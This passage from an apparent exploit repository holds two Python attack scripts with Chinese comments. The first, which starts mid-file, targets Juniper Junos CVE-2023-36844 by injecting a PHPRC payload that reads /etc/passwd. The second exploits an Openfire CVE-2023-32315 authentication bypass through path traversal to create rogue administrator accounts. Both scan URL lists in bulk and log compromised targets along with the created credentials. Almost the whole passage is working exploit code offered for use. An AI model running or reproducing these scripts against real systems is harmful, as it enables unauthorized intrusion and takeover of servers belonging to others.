'auto_prepend_file="/etc/passwd"' 13 | try: 14 | response = requests.post(url + "/?PHPRC=/dev/fd/0", headers=headers, data=payload, proxies=proxies, verify=False) 15 | if response.status_code == 200 and "root:" in response.text: 16 | with open(success_file, 'a') as s_file: 17 | s_file.write(f"++++++++++++++++++\n") 18 | s_file.write(f"目标URL: {url}\n") 19 | s_file.write(f"Payload: cat /etc/passwd\n") 20 | s_file.write(f"响应内容:\n{response.text}\n\n") 21 | return True 22 | except Exception as e: 23 | print(f"发生异常:{e}") 24 | return False 25 | 26 | def scan_targets(targets, proxies={}, success_file=None): 27 | for target in targets: 28 | target = target.strip() 29 | check_for_vulnerability(target, proxies, success_file) 30 | 31 | if __name__ == '__main__': 32 | parser = argparse.ArgumentParser(description="Juniper Networks Junos OS 远程代码执行漏洞 CVE-2023-36844") 33 | parser.add_argument("-u", "--url", help="目标URL") 34 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt") 35 | args = parser.parse_args() 36 | 37 | if not args.url and not args.file: 38 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。") 39 | exit(1) 40 | 41 | if args.url: 42 | urls = [args.url] 43 | elif args.file: 44 | with open(args.file, 'r') as file: 45 | urls = file.readlines() 46 | 47 | proxies = {} 48 | success_file = 'success_targets.txt' 49 | 50 | for url in urls: 51 | url = url.strip() 52 | scan_targets([url], proxies, success_file) 53 | 54 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。") 55 | -------------------------------------------------------------------------------- /openfire_CVE-2023-32315_exploit.py: -------------------------------------------------------------------------------- 1 | # 作者: VulnExpo 2 | # 日期: 2023-10-23 3 | 4 | import requests 5 | import argparse 6 | import threading 7 | import httplib2 8 | import random 9 | import re 10 | import string 11 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) 12 | 13 | def generate_random_username(length=8): 14 | return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length)) 15 | 16 | def generate_random_password(length=12): 17 | return ''.join(random.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(length)) 18 | 19 | def check_for_vulnerability(url, proxies=None, success_file=None): 20 | path = '/setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp' 21 | rsp_list = '' 22 | http = httplib2.Http(disable_ssl_certificate_validation=True, proxy_info=None, timeout=10) 23 | try: 24 | response, content = http.request(url + path, method='GET') 25 | for header_name, header_value in response.items(): 26 | rsp_list += header_value 27 | if "csrf=" in rsp_list: 28 | JSESSIONID = re.findall(r'JSESSIONID=(.*?);', rsp_list)[0] 29 | csrf = re.findall(r'csrf=(.*?);', rsp_list)[0] 30 | else: 31 | return False 32 | headers = { 33 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36', 34 | 'Cookie': 'JSESSIONID={}; csrf={}'.format(JSESSIONID, csrf) 35 | } 36 | random_username = generate_random_username() 37 | random_password = generate_random_password() 38 | addpath = '/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf={}&username={}&name=&email=&password={}&passwordConfirm={}&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7'.format( 39 | csrf, random_username, random_password, random_password) 40 | add_user, content = http.request(url + addpath, method='GET', headers=headers) 41 | if add_user.status == 200 and "at" in content.decode('utf-8'): 42 | print(f"目标URL: {url} username: {random_username}, password: {random_password}") 43 | with open(success_file, 'a') as s_file: 44 | s_file.write(f"++++++++++++++++++\n") 45 | s_file.write(f"目标URL: {url}\n") 46 | s_file.write(f"响应内容: username: {random_username}, password: {random_password}\n\n") 47 | return True 48 | except Exception as e: 49 | print(f"发生异常:{e}") 50 | return False 51 | 52 | def scan_targets(targets, proxies=None, success_file=None): 53 | for target in targets: 54 | target = target.strip() 55 | check_for_vulnerability(target, proxies, success_file) 56 | 57 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4): 58 | threads = [] 59 | 60 | for i in range(num_threads): 61 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file)) 62 | threads.append(thread) 63 | 64 | for thread in threads: 65 | thread.start() 66 | 67 | for thread in threads: 68 | thread.join() 69 | 70 | if __name__ == '__main__': 71 | parser = argparse.ArgumentParser(description="Openfire 身份认证绕过CVE-2023-32315") 72 | parser.add_argument("-u", "--url", help="目标URL") 73 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt") 74 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4") 75 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)") 76 | args = parser.parse_args() 77 | 78 | if not args.url and not args.file: 79 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。") 80 | exit(1) 81 | 82 | if args.url: 83 | urls = [args.url] 84 | elif args.file: 85 | with open(args.file, 'r') as file: 86 | urls = file.readlines() 87 | 88 | success_file = 'success_targets.txt' 89 | 90 | proxies = { 91 | "http": args.proxy, 92 | "https": args.proxy 93 | } if args.proxy else None 94 | 95 | multi_threaded_scan(urls, proxies, success_file, args.threads) 96 | 97 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。" 98 | --------------------------------------------------------------------------------